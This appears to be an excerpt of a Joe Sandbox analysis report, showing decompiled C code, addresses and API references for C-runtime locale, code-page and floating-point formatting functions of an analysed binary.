                                                0x001c1988
                                                0x001c199e
                                                0x001c198f
                                                0x001c1993
                                                0x001c1993
                                                0x001c19a3
                                                0x00000000
                                                0x001c19a3
                                                0x001c1961

                                                APIs
                                                  • Part of subcall function 001B782A: GetLastError.KERNEL32(?,00000008,001BDC99), ref: 001B782E
                                                  • Part of subcall function 001B782A: SetLastError.KERNEL32(00000000,001D43C0,00000024,001B2DC9), ref: 001B78D0
                                                • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 001C19C4
                                                • IsValidCodePage.KERNEL32(00000000), ref: 001C1A0D
                                                • IsValidLocale.KERNEL32(?,00000001), ref: 001C1A1C
                                                • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 001C1A64
                                                • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 001C1A83
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                • String ID:
                                                • API String ID: 415426439-0
                                                • Opcode ID: eddfe3a4d02679e8506cab849c1d4b2406923338f2bf5953142d373fcb621710
                                                • Instruction ID: efcee534a162d1137a0ddaebfed7fe70648ed20aa817d76d684af278a37bb627
                                                • Opcode Fuzzy Hash: eddfe3a4d02679e8506cab849c1d4b2406923338f2bf5953142d373fcb621710
                                                • Instruction Fuzzy Hash: 47517C72A40209BBDB10EFA5CC51FAE77B8AF66704F54446EE904E7192E7B0DA40CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 70%
                                                			E001C0F54(void* __ecx, void* __edx, intOrPtr* _a4, signed short* _a8, intOrPtr _a12) {
                                                				intOrPtr* _v8;
                                                				short _v12;
                                                				signed int _v32;
                                                				intOrPtr _v40;
                                                				signed int _v52;
                                                				char _v272;
                                                				short _v292;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* _t33;
                                                				short* _t34;
                                                				intOrPtr* _t35;
                                                				void* _t37;
                                                				intOrPtr* _t38;
                                                				signed short _t39;
                                                				signed short* _t42;
                                                				intOrPtr _t45;
                                                				void* _t47;
                                                				signed int _t50;
                                                				void* _t52;
                                                				signed int _t56;
                                                				void* _t68;
                                                				void* _t72;
                                                				void* _t73;
                                                				void* _t77;
                                                				intOrPtr* _t84;
                                                				short* _t87;
                                                				void* _t89;
                                                				intOrPtr* _t92;
                                                				intOrPtr* _t96;
                                                				short _t114;
                                                				void* _t115;
                                                				intOrPtr* _t117;
                                                				intOrPtr _t119;
                                                				signed int* _t120;
                                                				void* _t121;
                                                				void* _t122;
                                                				intOrPtr* _t123;
                                                				signed short _t125;
                                                				int _t127;
                                                				void* _t128;
                                                				void* _t131;
                                                				signed int _t132;
                                                
                                                				_push(__ecx);
                                                				_push(__ecx);
                                                				_push(_t122);
                                                				_t117 = _a4;
                                                				_t33 = E001B782A(__ecx, __edx, _t122);
                                                				_t114 = 0;
                                                				_v12 = 0;
                                                				_t3 = _t33 + 0x50; // 0x50
                                                				_t123 = _t3;
                                                				_t4 = _t123 + 0x250; // 0x2a0
                                                				_t34 = _t4;
                                                				 *((intOrPtr*)(_t123 + 8)) = 0;
                                                				 *_t34 = 0;
                                                				_t6 = _t123 + 4; // 0x54
                                                				_t84 = _t6;
                                                				_v8 = _t34;
                                                				_t92 = _t117;
                                                				_t35 = _t117 + 0x80;
                                                				 *_t123 = _t117;
                                                				 *_t84 = _t35;
                                                				if( *_t35 != 0) {
                                                					E001C0EE7(0x1cb690, 0x16, _t84);
                                                					_t92 =  *_t123;
                                                					_t131 = _t131 + 0xc;
                                                					_t114 = 0;
                                                				}
                                                				_push(_t123);
                                                				if( *_t92 == _t114) {
                                                					E001C0858(_t84, _t92);
                                                					goto L12;
                                                				} else {
                                                					if( *((intOrPtr*)( *_t84)) == _t114) {
                                                						E001C0978();
                                                					} else {
                                                						E001C08DF(_t92);
                                                					}
                                                					if( *((intOrPtr*)(_t123 + 8)) == 0) {
                                                						_t77 = E001C0EE7(0x1cb380, 0x40, _t123);
                                                						_t131 = _t131 + 0xc;
                                                						if(_t77 != 0) {
                                                							_push(_t123);
                                                							if( *((intOrPtr*)( *_t84)) == 0) {
                                                								E001C0978();
                                                							} else {
                                                								E001C08DF(0);
                                                							}
                                                							L12:
                                                						}
                                                					}
                                                				}
                                                				if( *((intOrPtr*)(_t123 + 8)) == 0) {
                                                					L37:
                                                					_t37 = 0;
                                                					goto L38;
                                                				} else {
                                                					_t38 = _t117 + 0x100;
                                                					if( *_t117 != 0 ||  *_t38 != 0) {
                                                						_t39 = E001C0DA4(_t38, _t123);
                                                					} else {
                                                						_t39 = GetACP();
                                                					}
                                                					_t125 = _t39;
                                                					if(_t125 == 0 || _t125 == 0xfde8 || IsValidCodePage(_t125 & 0x0000ffff) == 0) {
                                                						goto L37;
                                                					} else {
                                                						_t42 = _a8;
                                                						if(_t42 != 0) {
                                                							 *_t42 = _t125;
                                                						}
                                                						_t119 = _a12;
                                                						if(_t119 == 0) {
                                                							L36:
                                                							_t37 = 1;
                                                							L38:
                                                							return _t37;
                                                						} else {
                                                							_t96 = _v8;
                                                							_t15 = _t119 + 0x120; // 0xd0
                                                							_t87 = _t15;
                                                							 *_t87 = 0;
                                                							_t16 = _t96 + 2; // 0x6
                                                							_t115 = _t16;
                                                							do {
                                                								_t45 =  *_t96;
                                                								_t96 = _t96 + 2;
                                                							} while (_t45 != _v12);
                                                							_t18 = (_t96 - _t115 >> 1) + 1; // 0x3
                                                							_t47 = E001BE13A(_t96 - _t115 >> 1, _t87, 0x55, _v8);
                                                							_t132 = _t131 + 0x10;
                                                							if(_t47 != 0) {
                                                								L39:
                                                								_push(0);
                                                								_push(0);
                                                								_push(0);
                                                								_push(0);
                                                								_push(0);
                                                								E001AFE70();
                                                								asm("int3");
                                                								_t130 = _t132;
                                                								_t50 =  *0x1d5010; // 0x8121a627
                                                								_v52 = _t50 ^ _t132;
                                                								_push(_t87);
                                                								_push(_t125);
                                                								_t126 = _v40;
                                                								_push(_t119);
                                                								_t52 = E001B782A(_t98, _t115, _v40);
                                                								_t88 = _t52;
                                                								_t120 =  *(E001B782A(_t98, _t115, _v40) + 0x34c);
                                                								_t127 = E001C168F(_t126);
                                                								asm("sbb ecx, ecx");
                                                								_t56 = GetLocaleInfoW(_t127, ( ~( *(_t52 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
                                                								if(_t56 != 0) {
                                                									if(E001BDE74(_t120, _t127,  *((intOrPtr*)(_t88 + 0x54)),  &_v272) == 0 && E001C17C4(_t127) != 0) {
                                                										 *_t120 =  *_t120 | 0x00000004;
                                                										_t120[2] = _t127;
                                                										_t120[1] = _t127;
                                                									}
                                                									_t62 =  !( *_t120 >> 2) & 0x00000001;
                                                								} else {
                                                									 *_t120 =  *_t120 & _t56;
                                                									_t62 = _t56 + 1;
                                                								}
                                                								_pop(_t121);
                                                								_pop(_t128);
                                                								_pop(_t89);
                                                								return E001A9545(_t62, _t89, _v32 ^ _t130, _t115, _t121, _t128);
                                                							} else {
                                                								if(E001B8C2E(_t87, 0x1001, _t119, 0x40) == 0) {
                                                									goto L37;
                                                								} else {
                                                									_t20 = _t119 + 0x80; // 0x30
                                                									_t87 = _t20;
                                                									_t21 = _t119 + 0x120; // 0xd0
                                                									if(E001B8C2E(_t21, 0x1002, _t87, 0x40) == 0) {
                                                										goto L37;
                                                									} else {
                                                										_t68 = E001C663B(_t87, 0x5f);
                                                										_pop(_t98);
                                                										if(_t68 != 0) {
                                                											L31:
                                                											_t22 = _t119 + 0x120; // 0xd0
                                                											if(E001B8C2E(_t22, 7, _t87, 0x40) == 0) {
                                                												goto L37;
                                                											} else {
                                                												goto L32;
                                                											}
                                                										} else {
                                                											_t73 = E001C663B(_t87, 0x2e);
                                                											_pop(_t98);
                                                											if(_t73 == 0) {
                                                												L32:
                                                												_t119 = _t119 + 0x100;
                                                												if(_t125 != 0xfde9) {
                                                													E001C4F5E(_t98, _t125, _t119, 0x10, 0xa);
                                                													goto L36;
                                                												} else {
                                                													_push(5);
                                                													_t72 = E001BE13A(_t98, _t119, 0x10, L"utf8");
                                                													_t132 = _t132 + 0x10;
                                                													if(_t72 != 0) {
                                                														goto L39;
                                                													} else {
                                                														goto L36;
                                                													}
                                                												}
                                                											} else {
                                                												goto L31;
                                                											}
                                                										}
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                			}















































                                                0x001c0f59
                                                0x001c0f5a
                                                0x001c0f5c
                                                0x001c0f5e
                                                0x001c0f61
                                                0x001c0f68
                                                0x001c0f6a
                                                0x001c0f6d
                                                0x001c0f6d
                                                0x001c0f70
                                                0x001c0f70
                                                0x001c0f76
                                                0x001c0f79
                                                0x001c0f7c
                                                0x001c0f7c
                                                0x001c0f7f
                                                0x001c0f82
                                                0x001c0f84
                                                0x001c0f8a
                                                0x001c0f8c
                                                0x001c0f91
                                                0x001c0f9b
                                                0x001c0fa0
                                                0x001c0fa2
                                                0x001c0fa5
                                                0x001c0fa5
                                                0x001c0fa7
                                                0x001c0fab
                                                0x001c0ff4
                                                0x00000000
                                                0x001c0fad
                                                0x001c0fb2
                                                0x001c0fbb
                                                0x001c0fb4
                                                0x001c0fb4
                                                0x001c0fb4
                                                0x001c0fc6
                                                0x001c0fd0
                                                0x001c0fd5
                                                0x001c0fda
                                                0x001c0fe0
                                                0x001c0fe4
                                                0x001c0fed
                                                0x001c0fe6
                                                0x001c0fe6
                                                0x001c0fe6
                                                0x001c0ff9
                                                0x001c0ff9
                                                0x001c0fda
                                                0x001c0fc6
                                                0x001c0fff
                                                0x001c113b
                                                0x001c113b
                                                0x00000000
                                                0x001c1005
                                                0x001c1005
                                                0x001c100e
                                                0x001c101f
                                                0x001c1015
                                                0x001c1015
                                                0x001c1015
                                                0x001c1026
                                                0x001c102a
                                                0x00000000
                                                0x001c104e
                                                0x001c104e
                                                0x001c1053
                                                0x001c1055
                                                0x001c1055
                                                0x001c1057
                                                0x001c105c
                                                0x001c1136
                                                0x001c1138
                                                0x001c113d
                                                0x001c1141
                                                0x001c1062
                                                0x001c1062
                                                0x001c1065
                                                0x001c1065
                                                0x001c106d
                                                0x001c1070
                                                0x001c1070
                                                0x001c1073
                                                0x001c1073
                                                0x001c1076
                                                0x001c1079
                                                0x001c1083
                                                0x001c108d
                                                0x001c1092
                                                0x001c1097
                                                0x001c1142
                                                0x001c1144
                                                0x001c1145
                                                0x001c1146
                                                0x001c1147
                                                0x001c1148
                                                0x001c1149
                                                0x001c114e
                                                0x001c1152
                                                0x001c115a
                                                0x001c1161
                                                0x001c1164
                                                0x001c1165
                                                0x001c1166
                                                0x001c1169
                                                0x001c116a
                                                0x001c116f
                                                0x001c1177
                                                0x001c1186
                                                0x001c1192
                                                0x001c11a3
                                                0x001c11ab
                                                0x001c11c5
                                                0x001c11d2
                                                0x001c11d5
                                                0x001c11d8
                                                0x001c11d8
                                                0x001c11e2
                                                0x001c11ad
                                                0x001c11ad
                                                0x001c11af
                                                0x001c11af
                                                0x001c11e8
                                                0x001c11e9
                                                0x001c11ec
                                                0x001c11f3
                                                0x001c109d
                                                0x001c10ad
                                                0x00000000
                                                0x001c10b3
                                                0x001c10b5
                                                0x001c10b5
                                                0x001c10c1
                                                0x001c10cf
                                                0x00000000
                                                0x001c10d1
                                                0x001c10d4
                                                0x001c10da
                                                0x001c10dd
                                                0x001c10ed
                                                0x001c10f2
                                                0x001c1100
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001c10df
                                                0x001c10e2
                                                0x001c10e8
                                                0x001c10eb
                                                0x001c1102
                                                0x001c1102
                                                0x001c110e
                                                0x001c112e
                                                0x00000000
                                                0x001c1110
                                                0x001c1110
                                                0x001c111a
                                                0x001c111f
                                                0x001c1124
                                                0x00000000
                                                0x001c1126
                                                0x00000000
                                                0x001c1126
                                                0x001c1124
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001c10eb
                                                0x001c10dd
                                                0x001c10cf
                                                0x001c10ad
                                                0x001c1097
                                                0x001c105c
                                                0x001c102a

                                                APIs
                                                  • Part of subcall function 001B782A: GetLastError.KERNEL32(?,00000008,001BDC99), ref: 001B782E
                                                  • Part of subcall function 001B782A: SetLastError.KERNEL32(00000000,001D43C0,00000024,001B2DC9), ref: 001B78D0
                                                • GetACP.KERNEL32(?,?,?,?,?,?,001B4778,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 001C1015
                                                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,001B4778,?,?,?,00000055,?,-00000050,?,?), ref: 001C1040
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 001C11A3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: ErrorLast$CodeInfoLocalePageValid
                                                • String ID: utf8
                                                • API String ID: 607553120-905460609
                                                • Opcode ID: ac3747eb249479c3d8fea8441e77ccefde5441bccb867b529c85a388b5b42a4d
                                                • Instruction ID: 39e38312f7272d4ba6496f95cffb3535cf7457ac03943b0efe3498ea22f4786a
                                                • Opcode Fuzzy Hash: ac3747eb249479c3d8fea8441e77ccefde5441bccb867b529c85a388b5b42a4d
                                                • Instruction Fuzzy Hash: 5C71D571640206BADB25AB75CC46FAA73A8EF79700F18442DF605D7182FB74ED81C7A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 82%
                                                			E001B6638(signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
                                                				signed int _v5;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				unsigned int _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				signed int _v40;
                                                				signed int _v48;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				signed char _t87;
                                                				void* _t93;
                                                				intOrPtr _t94;
                                                				signed int _t98;
                                                				signed int _t100;
                                                				signed int _t101;
                                                				signed int _t104;
                                                				signed int _t105;
                                                				signed int _t106;
                                                				signed int _t111;
                                                				void* _t113;
                                                				signed int _t114;
                                                				void* _t115;
                                                				void* _t118;
                                                				void* _t120;
                                                				void* _t122;
                                                				signed int* _t124;
                                                				void* _t127;
                                                				signed int _t129;
                                                				signed int _t131;
                                                				signed int _t136;
                                                				signed int* _t140;
                                                				signed int _t141;
                                                				signed int _t146;
                                                				signed int _t147;
                                                				signed int _t149;
                                                				signed int _t154;
                                                				signed int _t155;
                                                				signed int _t156;
                                                				signed int _t157;
                                                				void* _t161;
                                                				unsigned int _t162;
                                                				intOrPtr _t171;
                                                				signed int _t173;
                                                				signed int* _t174;
                                                				signed int _t176;
                                                				signed int _t177;
                                                				signed int _t178;
                                                				signed int _t183;
                                                				signed int _t184;
                                                				signed int _t185;
                                                				signed int _t186;
                                                				signed int _t188;
                                                				intOrPtr _t189;
                                                				void* _t190;
                                                
                                                				_t186 = _a24;
                                                				if(_t186 < 0) {
                                                					_t186 = 0;
                                                				}
                                                				_t183 = _a8;
                                                				_t3 = _t186 + 0xb; // 0xb
                                                				 *_t183 = 0;
                                                				if(_a12 > _t3) {
                                                					_t140 = _a4;
                                                					_t147 = _t140[1];
                                                					_t173 =  *_t140;
                                                					__eflags = (_t147 >> 0x00000014 & 0x000007ff) - 0x7ff;
                                                					if(__eflags != 0) {
                                                						__eflags = _t147;
                                                						if(__eflags > 0) {
                                                							L13:
                                                							_t20 = _t183 + 1; // 0x2
                                                							_t174 = _t20;
                                                							_t87 = _a28 ^ 0x00000001;
                                                							_v20 = 0x3ff;
                                                							_v5 = _t87;
                                                							_v16 = _t174;
                                                							_v48 = ((_t87 & 0x000000ff) << 5) + 7;
                                                							__eflags = _t147 & 0x7ff00000;
                                                							_t93 = 0x30;
                                                							if((_t147 & 0x7ff00000) != 0) {
                                                								 *_t183 = 0x31;
                                                								L18:
                                                								_t149 = 0;
                                                								__eflags = 0;
                                                								L19:
                                                								_t28 =  &(_t174[0]); // 0x2
                                                								_t184 = _t28;
                                                								__eflags = _t186;
                                                								if(_t186 != 0) {
                                                									_t94 = _a40;
                                                									__eflags =  *((char*)(_t94 + 0x14));
                                                									if( *((char*)(_t94 + 0x14)) == 0) {
                                                										E001AF970(_t94);
                                                										_t94 = _a40;
                                                										_t174 = _v16;
                                                									}
                                                									_t149 = 0;
                                                									__eflags = 0;
                                                									_t98 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)) + 0x88))))));
                                                								} else {
                                                									_t98 = _t149;
                                                								}
                                                								 *_t174 = _t98;
                                                								_t100 = _t140[1] & 0x000fffff;
                                                								__eflags = _t100;
                                                								_v40 = _t100;
                                                								if(_t100 > 0) {
                                                									L26:
                                                									_t175 = _t149;
                                                									_t150 = 0xf0000;
                                                									_t101 = 0x30;
                                                									_v12 = _t101;
                                                									_v24 = _t149;
                                                									_v28 = 0xf0000;
                                                									while(1) {
                                                										_v32 = _v12 & 0x0000ffff;
                                                										_t104 = _t184;
                                                										_v36 = _t184;
                                                										_v40 = _t186;
                                                										__eflags = _t186;
                                                										if(__eflags <= 0) {
                                                											break;
                                                										}
                                                										_t127 = E001C6190( *_t140 & _t175, _v32 & 0x0000ffff, _t140[1] & _t150 & 0x000fffff);
                                                										_t161 = 0x30;
                                                										_t129 = _t127 + _t161 & 0x0000ffff;
                                                										__eflags = _t129 - 0x39;
                                                										if(_t129 > 0x39) {
                                                											_t129 = _t129 + _v48;
                                                											__eflags = _t129;
                                                										}
                                                										_t162 = _v28;
                                                										_t175 = (_t162 << 0x00000020 | _v24) >> 4;
                                                										 *_t184 = _t129;
                                                										_t184 = _t184 + 1;
                                                										_t150 = _t162 >> 4;
                                                										_t131 = _v12 - 4;
                                                										_t186 = _t186 - 1;
                                                										_v24 = (_t162 << 0x00000020 | _v24) >> 4;
                                                										_v28 = _t162 >> 4;
                                                										_v12 = _t131;
                                                										__eflags = _t131;
                                                										if(_t131 >= 0) {
                                                											continue;
                                                										} else {
                                                											goto L43;
                                                										}
                                                									}
                                                									_t186 = _v40;
                                                									_t184 = _t104;
                                                									_t105 = E001B6E69(__eflags, _t140, _t175, _t150, _v32, _a36);
                                                									_t190 = _t190 + 0x14;
                                                									__eflags = _t105;
                                                									if(_t105 == 0) {
                                                										goto L43;
                                                									}
                                                									_t184 = _v36;
                                                									_t146 = 0x30;
                                                									_t124 = _t184 - 1;
                                                									while(1) {
                                                										_t156 =  *_t124;
                                                										__eflags = _t156 - 0x66;
                                                										if(_t156 == 0x66) {
                                                											goto L36;
                                                										}
                                                										__eflags = _t156 - 0x46;
                                                										if(_t156 != 0x46) {
                                                											_t140 = _a4;
                                                											__eflags = _t124 - _v16;
                                                											if(_t124 == _v16) {
                                                												_t65 = _t124 - 1;
                                                												 *_t65 =  *(_t124 - 1) + 1;
                                                												__eflags =  *_t65;
                                                											} else {
                                                												__eflags = _t156 - 0x39;
                                                												if(_t156 != 0x39) {
                                                													_t157 = _t156 + 1;
                                                													__eflags = _t157;
                                                												} else {
                                                													_t157 = _v48 + 0x3a;
                                                												}
                                                												 *_t124 = _t157;
                                                											}
                                                											goto L43;
                                                										}
                                                										L36:
                                                										 *_t124 = _t146;
                                                										_t124 = _t124 - 1;
                                                									}
                                                								} else {
                                                									__eflags =  *_t140 - _t149;
                                                									if( *_t140 <= _t149) {
                                                										L43:
                                                										__eflags = _t186;
                                                										if(_t186 > 0) {
                                                											_push(_t186);
                                                											_t122 = 0x30;
                                                											_push(_t122);
                                                											_push(_t184);
                                                											E001AAF60(_t184);
                                                											_t184 = _t184 + _t186;
                                                											__eflags = _t184;
                                                										}
                                                										_t106 = _v16;
                                                										__eflags =  *_t106;
                                                										if( *_t106 == 0) {
                                                											_t184 = _t106;
                                                										}
                                                										 *_t184 = (_v5 << 5) + 0x50;
                                                										_t176 = _t140[1];
                                                										_t111 = E001C6190( *_t140, 0x34, _t176);
                                                										_t141 = 0;
                                                										_t188 = _t176 & 0;
                                                										_t70 = _t184 + 2; // 0x2
                                                										_t177 = _t70;
                                                										_t154 = (_t111 & 0x000007ff) - _v20;
                                                										__eflags = _t154;
                                                										_v48 = _t177;
                                                										asm("sbb esi, ebx");
                                                										if(__eflags < 0) {
                                                											L51:
                                                											_t154 =  ~_t154;
                                                											asm("adc esi, ebx");
                                                											_t188 =  ~_t188;
                                                											0x2b = 0x2d;
                                                											goto L52;
                                                										} else {
                                                											if(__eflags > 0) {
                                                												L50:
                                                												L52:
                                                												 *(_t184 + 1) = 0x2b;
                                                												_t185 = _t177;
                                                												_t113 = 0x30;
                                                												 *_t177 = _t113;
                                                												__eflags = _t188 - _t141;
                                                												if(__eflags < 0) {
                                                													L61:
                                                													_t178 = 0x30;
                                                													L62:
                                                													__eflags = _t188 - _t141;
                                                													if(__eflags < 0) {
                                                														L66:
                                                														_t155 = _t154 + _t178;
                                                														__eflags = _t155;
                                                														 *_t185 = _t155;
                                                														 *(_t185 + 1) = _t141;
                                                														L67:
                                                														_t114 = 0;
                                                														__eflags = 0;
                                                														L68:
                                                														return _t114;
                                                													}
                                                													if(__eflags > 0) {
                                                														L65:
                                                														_push(_t141);
                                                														_push(_t141);
                                                														_push(0xa);
                                                														_push(_t188);
                                                														_push(_t154);
                                                														_t115 = E001C61B0();
                                                														_v48 = _t178;
                                                														_t178 = 0x30;
                                                														 *_t185 = _t115 + _t178;
                                                														_t185 = _t185 + 1;
                                                														_t141 = 0;
                                                														__eflags = 0;
                                                														goto L66;
                                                													}
                                                													__eflags = _t154 - 0xa;
                                                													if(_t154 < 0xa) {
                                                														goto L66;
                                                													}
                                                													goto L65;
                                                												}
                                                												if(__eflags > 0) {
                                                													L55:
                                                													_push(_t141);
                                                													_push(_t141);
                                                													_push(0x3e8);
                                                													_push(_t188);
                                                													_push(_t154);
                                                													_t118 = E001C61B0();
                                                													_t188 = _t141;
                                                													_v40 = _t177;
                                                													_t177 = _v48;
                                                													_t141 = 0;
                                                													_t185 = _t177 + 1;
                                                													 *_t177 = _t118 + 0x30;
                                                													__eflags = _t185 - _t177;
                                                													if(_t185 != _t177) {
                                                														L59:
                                                														_push(_t141);
                                                														_push(_t141);
                                                														_push(0x64);
                                                														_push(_t188);
                                                														_push(_t154);
                                                														_t120 = E001C61B0();
                                                														_t188 = _t141;
                                                														_v40 = _t177;
                                                														_t141 = 0;
                                                														_t178 = 0x30;
                                                														 *_t185 = _t120 + _t178;
                                                														_t185 = _t185 + 1;
                                                														__eflags = _t185 - _v48;
                                                														if(_t185 != _v48) {
                                                															goto L65;
                                                														}
                                                														goto L62;
                                                													}
                                                													L56:
                                                													__eflags = _t188 - _t141;
                                                													if(__eflags < 0) {
                                                														goto L61;
                                                													}
                                                													if(__eflags > 0) {
                                                														goto L59;
                                                													}
                                                													__eflags = _t154 - 0x64;
                                                													if(_t154 < 0x64) {
                                                														goto L61;
                                                													}
                                                													goto L59;
                                                												}
                                                												__eflags = _t154 - 0x3e8;
                                                												if(_t154 < 0x3e8) {
                                                													goto L56;
                                                												}
                                                												goto L55;
                                                											}
                                                											__eflags = _t154;
                                                											if(_t154 < 0) {
                                                												goto L51;
                                                											}
                                                											goto L50;
                                                										}
                                                									}
                                                									goto L26;
                                                								}
                                                							}
                                                							 *_t183 = _t93;
                                                							_t149 =  *_t140 | _t140[1] & 0x000fffff;
                                                							__eflags = _t149;
                                                							if(_t149 != 0) {
                                                								_v20 = 0x3fe;
                                                								goto L18;
                                                							}
                                                							_v20 = _t149;
                                                							goto L19;
                                                						}
                                                						if(__eflags < 0) {
                                                							L12:
                                                							 *_t183 = 0x2d;
                                                							_t183 = _t183 + 1;
                                                							__eflags = _t183;
                                                							_t147 = _t140[1];
                                                							goto L13;
                                                						}
                                                						__eflags = _t173;
                                                						if(_t173 >= 0) {
                                                							goto L13;
                                                						}
                                                						goto L12;
                                                					}
                                                					_t114 = E001B6964(_t140, _t147, _t173, __eflags, _t140, _t183, _a12, _a16, _a20, _t186, 0, _a32, _a36, _a40);
                                                					__eflags = _t114;
                                                					if(_t114 == 0) {
                                                						_t136 = E001C63D0(_t183, 0x65);
                                                						__eflags = _t136;
                                                						if(_t136 != 0) {
                                                							 *_t136 = ((_a28 ^ 0x00000001) << 5) + 0x50;
                                                							 *((char*)(_t136 + 3)) = 0;
                                                						}
                                                						goto L67;
                                                					}
                                                					 *_t183 = 0;
                                                					goto L68;
                                                				}
                                                				_t171 = _a40;
                                                				_t189 = 0x22;
                                                				 *((char*)(_t171 + 0x1c)) = 1;
                                                				 *((intOrPtr*)(_t171 + 0x18)) = _t189;
                                                				E001AFDC6(_t183, _t189, 0, 0, 0, 0, 0, _t171);
                                                				return _t189;
                                                			}






























































                                                0x001b6643
                                                0x001b6649
                                                0x001b664b
                                                0x001b664b
                                                0x001b664d
                                                0x001b6650
                                                0x001b6653
                                                0x001b6658
                                                0x001b667d
                                                0x001b6680
                                                0x001b6685
                                                0x001b668f
                                                0x001b6694
                                                0x001b66ed
                                                0x001b66ef
                                                0x001b66fe
                                                0x001b6701
                                                0x001b6701
                                                0x001b6704
                                                0x001b6706
                                                0x001b670d
                                                0x001b671f
                                                0x001b6722
                                                0x001b6727
                                                0x001b672b
                                                0x001b672c
                                                0x001b674c
                                                0x001b674f
                                                0x001b674f
                                                0x001b674f
                                                0x001b6751
                                                0x001b6751
                                                0x001b6751
                                                0x001b6754
                                                0x001b6756
                                                0x001b675c
                                                0x001b675f
                                                0x001b6763
                                                0x001b6767
                                                0x001b676c
                                                0x001b676f
                                                0x001b676f
                                                0x001b6775
                                                0x001b6775
                                                0x001b677f
                                                0x001b6758
                                                0x001b6758
                                                0x001b6758
                                                0x001b6781
                                                0x001b6786
                                                0x001b6786
                                                0x001b678b
                                                0x001b678e
                                                0x001b6798
                                                0x001b679a
                                                0x001b679c
                                                0x001b67a1
                                                0x001b67a2
                                                0x001b67a5
                                                0x001b67a8
                                                0x001b67ab
                                                0x001b67b1
                                                0x001b67b4
                                                0x001b67b6
                                                0x001b67b9
                                                0x001b67bc
                                                0x001b67be
                                                0x00000000
                                                0x00000000
                                                0x001b67d5
                                                0x001b67dc
                                                0x001b67e0
                                                0x001b67e3
                                                0x001b67e6
                                                0x001b67e8
                                                0x001b67e8
                                                0x001b67e8
                                                0x001b67ee
                                                0x001b67f1
                                                0x001b67f5
                                                0x001b67f7
                                                0x001b67fb
                                                0x001b67fe
                                                0x001b6801
                                                0x001b6802
                                                0x001b6805
                                                0x001b6808
                                                0x001b680b
                                                0x001b680e
                                                0x00000000
                                                0x001b6810
                                                0x00000000
                                                0x001b6810
                                                0x001b680e
                                                0x001b6815
                                                0x001b6818
                                                0x001b6820
                                                0x001b6825
                                                0x001b6828
                                                0x001b682a
                                                0x00000000
                                                0x00000000
                                                0x001b682c
                                                0x001b6831
                                                0x001b6832
                                                0x001b6835
                                                0x001b6835
                                                0x001b6837
                                                0x001b683a
                                                0x00000000
                                                0x00000000
                                                0x001b683c
                                                0x001b683f
                                                0x001b6846
                                                0x001b6849
                                                0x001b684c
                                                0x001b6861
                                                0x001b6861
                                                0x001b6861
                                                0x001b684e
                                                0x001b684e
                                                0x001b6851
                                                0x001b685b
                                                0x001b685b
                                                0x001b6853
                                                0x001b6856
                                                0x001b6856
                                                0x001b685d
                                                0x001b685d
                                                0x00000000
                                                0x001b684c
                                                0x001b6841
                                                0x001b6841
                                                0x001b6843
                                                0x001b6843
                                                0x001b6790
                                                0x001b6790
                                                0x001b6792
                                                0x001b6864
                                                0x001b6864
                                                0x001b6866
                                                0x001b6868
                                                0x001b686b
                                                0x001b686c
                                                0x001b686d
                                                0x001b686e
                                                0x001b6876
                                                0x001b6876
                                                0x001b6876
                                                0x001b6878
                                                0x001b687b
                                                0x001b687e
                                                0x001b6880
                                                0x001b6880
                                                0x001b688c
                                                0x001b6890
                                                0x001b6893
                                                0x001b6898
                                                0x001b68a4
                                                0x001b68a6
                                                0x001b68a6
                                                0x001b68a9
                                                0x001b68a9
                                                0x001b68ac
                                                0x001b68af
                                                0x001b68b1
                                                0x001b68bd
                                                0x001b68bd
                                                0x001b68c1
                                                0x001b68c3
                                                0x001b68c5
                                                0x00000000
